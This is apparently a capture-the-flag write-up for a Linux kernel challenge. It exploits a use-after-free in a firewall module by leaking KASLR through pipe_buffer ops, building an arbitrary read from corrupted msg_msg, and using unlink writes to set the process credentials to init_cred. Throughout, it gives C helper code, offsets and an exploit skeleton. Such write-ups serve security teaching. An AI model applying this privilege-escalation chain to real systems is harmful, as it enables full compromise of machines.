pwn | free | hard

throughthewall

b01lersc

Task: exploit a Linux kernel firewall module in a QEMU guest with PTI, KASLR, SMEP, and SMAP enabled. Solution: turn a stale kmalloc-1024 rule object into a pipe_buffer KASLR leak, then use msg_msg corruption for arbitrary read and unlink-based writes to swap current->cred pointers to init_cred.

$ ls tags/ techniques/
uaf_reuse  pipe_buffer_ops_leak  msg_msg_arbitrary_read  list_del_unlink_write  cred_pointer_swap

throughthewall — b01lersc (BCTF 2026)

Description

Goal: Exploit the firewall module!

We are given a kernel-pwn challenge with three files: bzImage, initramfs.cpio.gz, and start.sh. The guest boots with pti=on, kaslr, SMEP, SMAP, and -smp 2, and the goal is to gain root inside the VM and read /flag.txt.

Files and environment

The provided launcher is:

qemu-system-x86_64 \
    -m 256M \
    -nographic \
    -kernel ./bzImage \
    -append "console=ttyS0 loglevel=3 oops=panic panic=-1 pti=on kaslr" \
    -no-reboot \
    -cpu qemu64,+smep,+smap \
    -smp 2 \
    -initrd ./initramfs.cpio.gz \
    -monitor /dev/null \
    -s

Important initramfs observations:

  • /dev/firewall is world-writable.
  • /dev/ptmx exists, but devpts is not mounted, so the usual tty_struct ptmx spray path is not practical.
  • SysV message queues are available.
  • Pipes are available.
  • dmesg is readable via klogctl, which turns kernel log output into a very strong infoleak source.

Vulnerable interface

The challenge module is firewall.ko, exposing four ioctls:

#define FW_ADD_RULE  0x41004601
#define FW_DEL_RULE  0x40044602
#define FW_EDIT_RULE 0x44184603
#define FW_SHOW_RULE 0x84184604
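The request numbers themselves carry some information. The sketch below splits them into the standard Linux ioctl fields (number, type, argument size, direction) as laid out on x86. The struct and function names are made up for illustration and are not taken from the module.

```c
#include <assert.h>
#include <stdint.h>

/* Fields packed into a Linux ioctl request number on x86:
 * bits 0-7 nr, bits 8-15 type, bits 16-29 size, bits 30-31 direction. */
struct ioc_fields {
    unsigned dir;   /* 1 = userspace writes the argument, 2 = userspace reads it */
    unsigned size;  /* size of the argument structure in bytes */
    char     type;  /* "magic" character shared by the driver's commands */
    unsigned nr;    /* command number */
};

/* Hypothetical helper: decode one request number into its fields. */
struct ioc_fields ioc_decode(uint32_t cmd)
{
    struct ioc_fields f;
    f.nr   = cmd & 0xff;
    f.type = (char)((cmd >> 8) & 0xff);
    f.size = (cmd >> 16) & 0x3fff;
    f.dir  = (cmd >> 30) & 0x3;
    return f;
}
```

Decoded this way, all four commands use type 'F'. FW_ADD_RULE takes a 0x100-byte argument, FW_DEL_RULE a 4-byte one, and FW_EDIT_RULE and FW_SHOW_RULE both take 0x418 bytes, which is 0x18 bytes more than the rule object itself. Only FW_SHOW_RULE is marked as a read from the kernel.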

Each firewall rule is a 0x400-byte object, so the interesting allocations live in kmalloc-1024.

The core bug is in delete: the module does kfree(rules[idx]) but does not clear rules[idx]. After that, both edit and show still operate on the stale pointer. That gives a stable use-after-free on a very sprayable cache size.
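To make the bug pattern concrete, here is a userspace toy model. It is not the module's code: the slot allocator, `fw_add`, and `fw_del_buggy` are invented stand-ins that only reproduce the "free without clearing the table entry" behavior described above.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define RULE_SIZE 0x400
#define NSLOTS    4

/* Toy stand-in for the kmalloc-1024 cache: fixed slots plus an in-use flag. */
static unsigned char slab[NSLOTS][RULE_SIZE];
static int in_use[NSLOTS];

static void *toy_alloc(void)
{
    for (int i = 0; i < NSLOTS; i++)
        if (!in_use[i]) { in_use[i] = 1; return slab[i]; }
    return NULL;
}

static void toy_free(void *p)
{
    for (int i = 0; i < NSLOTS; i++)
        if (p == (void *)slab[i]) in_use[i] = 0;
}

static void *rules[8];   /* models the module's rule table */

static void fw_add(int idx) { rules[idx] = toy_alloc(); }

/* Mirrors the bug: the object is released but rules[idx] keeps pointing at it. */
static void fw_del_buggy(int idx) { toy_free(rules[idx]); }

/* Returns 1 if the stale table entry now aliases a newer allocation. */
int uaf_demo(void)
{
    fw_add(0);
    fw_del_buggy(0);
    unsigned char *victim = toy_alloc();   /* plays the pipe ring or msg_msg */
    if (victim == NULL)
        return 0;
    memset(victim, 0x41, RULE_SIZE);
    return rules[0] == (void *)victim && ((unsigned char *)rules[0])[0] == 0x41;
}
```

In the real exploit the "victim" is whatever kernel object is sprayed into the freed slot, and edit/show on the stale index become a write/read of that object.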

Analysis

1. Strong heap pointer leak from kernel logs

The module logs raw heap pointers with %px in fw_del_rule and fw_show_rule. Because dmesg is readable, every delete gives us the exact address of the freed firewall object.

That matters a lot: instead of guessing which allocation reclaimed the freed slot, we can free a rule, read the log, and then inspect the stale object with FW_SHOW_RULE until we recognize the replacement structure.
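A minimal sketch of that log-scraping step, assuming glibc's `klogctl` wrapper is available. The exact message text printed by the module is not shown in this writeup, so the parser simply takes the last 16-digit hex token starting with `ffff`. The helper names are hypothetical.

```c
#include <assert.h>
#include <ctype.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <sys/klog.h>

#define SYSLOG_ACTION_READ_ALL 3   /* syslog(2) action: read the whole ring buffer */

/* Return the last 16-hex-digit token in `log` that starts with "ffff",
 * or 0 if there is none. The log format itself is an assumption. */
uint64_t last_kernel_ptr(const char *log)
{
    uint64_t found = 0;
    for (const char *p = log; *p; p++) {
        if (strncmp(p, "ffff", 4) != 0)
            continue;
        size_t n = 0;
        while (n < 16 && isxdigit((unsigned char)p[n]))
            n++;
        if (n == 16 && !isxdigit((unsigned char)p[16])) {
            found = strtoull(p, NULL, 16);
            p += 15;               /* skip the rest of this token */
        }
    }
    return found;
}

/* Read the kernel log and return the most recently printed pointer, or 0. */
uint64_t leak_freed_rule(void)
{
    static char buf[1 << 16];
    int n = klogctl(SYSLOG_ACTION_READ_ALL, buf, (int)sizeof(buf) - 1);
    if (n < 0)
        return 0;
    buf[n] = '\0';
    return last_kernel_ptr(buf);
}
```

Calling `leak_freed_rule()` right after FW_DEL_RULE would return the address of the object that was just freed, provided no later log line contains another pointer.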

2. Pipe spray for KASLR bypass

The freed 0x400 firewall chunk can be reclaimed by a pipe buffer ring allocation. On this kernel, the default pipe ring contains 16 struct pipe_buffer entries, for a total size of 16 * 0x28 = 0x280 bytes. That is too large for kmalloc-512, so the ring is served from kmalloc-1024, the same cache as the firewall rules.
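The spray itself can be sketched as below. It assumes the usual behavior that the ring is allocated when the pipe is created and that an entry's `ops` field is only filled in once data is written, which is why each pipe gets one byte. The function name and the spray count are illustrative, not taken from the solver.

```c
#include <assert.h>
#include <unistd.h>

#define NPIPES 64   /* hypothetical spray count */

/* Create up to `n` pipes and write one byte into each so that the first
 * entry of every ring is populated. Returns the number of pipes created. */
int spray_pipes(int fds[][2], int n)
{
    int made = 0;
    for (int i = 0; i < n; i++) {
        if (pipe(fds[i]) < 0)
            break;
        if (write(fds[i][1], "A", 1) != 1) {
            close(fds[i][0]);
            close(fds[i][1]);
            break;
        }
        made++;
    }
    return made;
}
```

The descriptors are kept open on purpose: closing a pipe frees its ring and would give the slot back to the allocator.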

After freeing a firewall rule and spraying pipes, FW_SHOW_RULE can disclose overlapping pipe_buffer entries. The useful field is:

  • pipe_buffer->ops at offset +0x10

For anonymous pipes this points to anon_pipe_buf_ops, so:

anon_pipe_buf_ops offset = 0x121ad80
kernel base = leaked_ops - 0x121ad80

In the successful run, the leak was exactly:

anon_pipe_buf_ops = 0xffffffff8221ad80
kernel base = 0xffffffff81000000
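The following sketch shows one way to pull the base out of a dumped object. It assumes the bytes returned by FW_SHOW_RULE start at offset 0 of the stale object. The mirror struct follows the 0x28-byte entry size and +0x10 `ops` offset given above, and candidates are filtered by the page offset of `anon_pipe_buf_ops`, which a page-aligned KASLR slide cannot change. All names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Userspace mirror of struct pipe_buffer (0x28 bytes, ops at +0x10). */
struct pipe_buffer_mirror {
    uint64_t page;
    uint32_t offset;
    uint32_t len;
    uint64_t ops;
    uint32_t flags;
    uint32_t pad;
    uint64_t private_;
};
_Static_assert(sizeof(struct pipe_buffer_mirror) == 0x28, "entry size");
_Static_assert(offsetof(struct pipe_buffer_mirror, ops) == 0x10, "ops offset");

#define OFF_ANON_PIPE_BUF_OPS 0x121ad80ULL

/* Walk the dump in 0x28-byte steps and return the kernel base derived from
 * the first plausible ops pointer, or 0 if none is found. */
uint64_t kbase_from_dump(const unsigned char *dump, size_t len)
{
    const size_t step = sizeof(struct pipe_buffer_mirror);
    for (size_t off = 0; off + step <= len; off += step) {
        struct pipe_buffer_mirror pb;
        memcpy(&pb, dump + off, sizeof(pb));
        if ((pb.ops >> 32) == 0xffffffffULL &&
            (pb.ops & 0xfff) == (OFF_ANON_PIPE_BUF_OPS & 0xfff))
            return pb.ops - OFF_ANON_PIPE_BUF_OPS;
    }
    return 0;
}
```

A return value of 0 means the slot was not reclaimed by a pipe ring yet, so the spray and the show can simply be repeated.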

3. msg_msg corruption for arbitrary read

For the read primitive, the stale firewall object is reclaimed with a SysV msg_msg. Then the exploit corrupts:

  • msg_msg.m_ts
  • msg_msg.next

and receives the message with:

msgrcv(..., MSG_COPY | IPC_NOWAIT | MSG_NOERROR)

This makes the kernel copy extra data from an attacker-chosen kernel address. One detail matters when parsing the result: the buffer filled by msgrcv begins with the long mtype field, and the first DATALEN_MSG bytes of message text come from the msg_msg itself, so the leaked bytes start at:

buf + sizeof(long) + DATALEN_MSG

with:

DATALEN_MSG = 0xfd0
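The constant follows from the header layout: DATALEN_MSG is one page minus the 0x30-byte msg_msg header. The sketch below mirrors that header and shows how the two corrupted fields would be set. The `target - 8` adjustment is an assumption based on the usual form of this technique (a message segment stores its own next pointer in the 8 bytes before its data, so the qword at `target - 8` should be zero to end the chain). It is not stated in the writeup, and the helper names are invented.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define PAGE_SIZE_ 0x1000UL
#define RULE_SIZE  0x400UL

/* Userspace mirror of the 0x30-byte struct msg_msg header on x86-64. */
struct msg_msg_mirror {
    uint64_t m_list_next;
    uint64_t m_list_prev;
    int64_t  m_type;
    uint64_t m_ts;       /* total message length */
    uint64_t next;       /* first continuation segment, or NULL */
    uint64_t security;
};
_Static_assert(sizeof(struct msg_msg_mirror) == 0x30, "header size");

#define DATALEN_MSG    (PAGE_SIZE_ - sizeof(struct msg_msg_mirror))  /* 0xfd0 */
/* Text length that makes header + text exactly one rule-sized object. */
#define SPRAY_TEXT_LEN (RULE_SIZE - sizeof(struct msg_msg_mirror))   /* 0x3d0 */

/* Set the two corrupted fields so that a MSG_COPY receive returns `nbytes`
 * read from `target` (assumed technique, see the text above). */
void forge_read_header(struct msg_msg_mirror *h, uint64_t target, size_t nbytes)
{
    h->m_ts = DATALEN_MSG + nbytes;
    h->next = target - 8;
}

/* Offset inside the msgrcv() user buffer where the bytes from `target` begin. */
size_t leak_offset(void)
{
    return sizeof(long) + DATALEN_MSG;
}
```

When writing the forged header through FW_EDIT_RULE, the remaining header fields would presumably need to keep their original values so the queue stays consistent.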

4. Leaking current_task

Because the guest runs on two CPUs, the exploit first pins itself to CPU 0 for stability. Then it reads the per-CPU current_task pointer from:

CPU0_PERCPU_BASE = 0xffff88800f800000
OFF_PERCPU_CURRENT_TASK = 0x1ad00

So:

current_task = *(u64 *)(CPU0_PERCPU_BASE + OFF_PERCPU_CURRENT_TASK)

The successful run leaked:

current_task = 0xffff88800470c740
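A small sketch of the pinning step and the address arithmetic, using the constants above. `pin_to_cpu0` and `current_task_slot` are hypothetical names. The point of pinning is that the per-CPU slot being read must belong to the CPU the exploit is actually running on.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <sched.h>
#include <stdint.h>

#define CPU0_PERCPU_BASE        0xffff88800f800000ULL
#define OFF_PERCPU_CURRENT_TASK 0x1ad00ULL

/* Restrict the calling thread to CPU 0. Returns 0 on success, -1 on error. */
int pin_to_cpu0(void)
{
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(0, &set);
    return sched_setaffinity(0, sizeof(set), &set);
}

/* Kernel virtual address of CPU 0's current_task slot on this build. */
uint64_t current_task_slot(void)
{
    return CPU0_PERCPU_BASE + OFF_PERCPU_CURRENT_TASK;
}
```

With these values the arbitrary read is aimed at 0xffff88800f81ad00.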

5. Data-only cred overwrite

No kernel RIP control is needed.

Once current_task and init_cred are known, the exploit reclaims another stale firewall chunk with a queued msg_msg and abuses the unlink write performed by list_del. The reclaimed object is filled so that unlink writes an arbitrary pointer value:

next = target - 8
prev = value

This yields writes to:

task->real_cred @ +0x740
task->cred @ +0x748

using:

init_cred = kernel_base + 0x1850e80

Overwriting both pointers with init_cred instantly makes the process root.
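The unlink arithmetic can be checked with a userspace model. The sketch below uses a byte array as fake kernel memory with offsets as addresses, and models the two stores of a list unlink with `next` at +0 and `prev` at +8. It illustrates the primitive only and is not kernel code. All names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Fake "kernel memory": addresses are byte offsets into this array. */
static unsigned char kmem[0x100];

static void write64(uint64_t addr, uint64_t val) { memcpy(kmem + addr, &val, 8); }

uint64_t read64(uint64_t addr)
{
    uint64_t v;
    memcpy(&v, kmem + addr, 8);
    return v;
}

/* Model of a list unlink: entry->next->prev = entry->prev;
 *                         entry->prev->next = entry->next; */
void model_list_del(uint64_t entry)
{
    uint64_t next = read64(entry + 0);
    uint64_t prev = read64(entry + 8);
    write64(next + 8, prev);   /* lands exactly on `target` */
    write64(prev + 0, next);   /* mirror store into the first qword at `value` */
}

/* Forge the list_head at `entry` so that unlinking stores `value` at `target`. */
void forge_unlink(uint64_t entry, uint64_t target, uint64_t value)
{
    write64(entry + 0, target - 8);   /* next */
    write64(entry + 8, value);        /* prev */
}
```

The model also shows the side effect of the primitive: the second store writes `target - 8` into the first 8 bytes at `value`, so `value` has to point at writable memory. Here that is init_cred, whose first qword is clobbered by each write.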

Exploit chain

  1. Open /dev/firewall and pin execution to CPU 0.
  2. Allocate and delete a firewall rule to create a stale kmalloc-1024 object.
  3. Read dmesg to recover the freed rule pointer from %px logs.
  4. Spray pipes until the stale slot overlaps a pipe_buffer ring.
  5. Leak anon_pipe_buf_ops from pipe_buffer->ops and compute the kernel base.
  6. Reclaim another stale rule with msg_msg and corrupt m_ts/next.
  7. Use msgrcv(MSG_COPY|IPC_NOWAIT|MSG_NOERROR) to build an arbitrary read primitive.
  8. Read the CPU-0 current_task pointer from per-CPU memory.
  9. Reclaim again with queued msg_msg and trigger an unlink write.
  10. Overwrite task->cred and task->real_cred with init_cred.
  11. Become root and read /flag.txt.

Key offsets and constants

FW_ADD_RULE = 0x41004601
FW_DEL_RULE = 0x40044602
FW_EDIT_RULE = 0x44184603
FW_SHOW_RULE = 0x84184604
RULE_SIZE = 0x400
DATALEN_MSG = 0xfd0
OFF_ANON_PIPE_BUF_OPS = 0x121ad80
OFF_INIT_CRED = 0x1850e80
OFF_TASK_REAL_CRED = 0x740
OFF_TASK_CRED = 0x748
OFF_PERCPU_CURRENT_TASK = 0x1ad00
CPU0_PERCPU_BASE = 0xffff88800f800000

Minimal exploit skeleton

The final solver was a tiny freestanding static binary. Its core logic is short:

kbase = setup_pipe_leak(fwfd);
task = kread64(fwfd, arb_idx, arb_qid, CPU0_PERCPU_BASE + OFF_PERCPU_CURRENT_TASK);
init_cred = kbase + OFF_INIT_CRED;
trigger_list_write(fwfd, "task->cred", task + OFF_TASK_CRED, init_cred);
trigger_list_write(fwfd, "task->real_cred", task + OFF_TASK_REAL_CRED, init_cred);
read_flag();

The important part is not code execution but composing three data-only primitives:

  • stale firewall object reuse,
  • pipe-based kernel text leak,
  • msg_msg-based read and unlink-based write.

Remote staging note

The exploitation itself became stable earlier than the remote upload path.

The main blocker on the remote SSL serial service was reliably staging the exploit binary. One failed attempt appended ; echo __AFTER__ after /home/ctf/exploit, which broke observation and execution in the BusyBox ash environment. The reliable solution was to rebuild the exploit as a very small freestanding static binary (exploit_tiny.c, about 10 KB) and upload it as base64 in multiple heredoc chunks with remote_run.py.

The smaller binary avoided the flaky transfer problems that affected the larger builds, and the remote run then behaved consistently.
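The staging idea can be sketched as a generator for the shell commands to send. This is not the author's remote_run.py: the chunk size, the `.b64` temporary file, and the assumption that the guest's BusyBox provides `base64 -d` are all illustrative.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

static const char B64[] =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

/* Encode `n` bytes from `in` as base64 into `out` (NUL-terminated).
 * `out` must hold at least 4 * ((n + 2) / 3) + 1 bytes. Returns the length. */
size_t b64_encode(const unsigned char *in, size_t n, char *out)
{
    size_t o = 0;
    for (size_t i = 0; i < n; i += 3) {
        unsigned v = (unsigned)in[i] << 16;
        if (i + 1 < n) v |= (unsigned)in[i + 1] << 8;
        if (i + 2 < n) v |= in[i + 2];
        out[o++] = B64[(v >> 18) & 63];
        out[o++] = B64[(v >> 12) & 63];
        out[o++] = (i + 1 < n) ? B64[(v >> 6) & 63] : '=';
        out[o++] = (i + 2 < n) ? B64[v & 63] : '=';
    }
    out[o] = '\0';
    return o;
}

/* Print shell commands that append `b64` to `<path>.b64` in heredoc chunks
 * of at most `chunk` characters, then decode it and mark it executable. */
void emit_upload(FILE *f, const char *b64, size_t chunk, const char *path)
{
    size_t len = strlen(b64);
    for (size_t off = 0; off < len; off += chunk) {
        size_t n = len - off < chunk ? len - off : chunk;
        fprintf(f, "cat >> %s.b64 <<'EOF'\n%.*s\nEOF\n", path, (int)n, b64 + off);
    }
    fprintf(f, "base64 -d %s.b64 > %s && chmod +x %s\n", path, path, path);
}
```

Keeping each heredoc short limits how much data a single dropped or garbled line on the serial link can damage, which is also why a smaller binary helps.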

Result

The successful remote output showed the full chain working:

  • stale pipe slot leak,
  • anon_pipe_buf_ops leak,
  • kernel base 0xffffffff81000000,
  • current_task leak,
  • writes to task->cred and task->real_cred,
  • uid=0 euid=0,
  • and finally the flag.
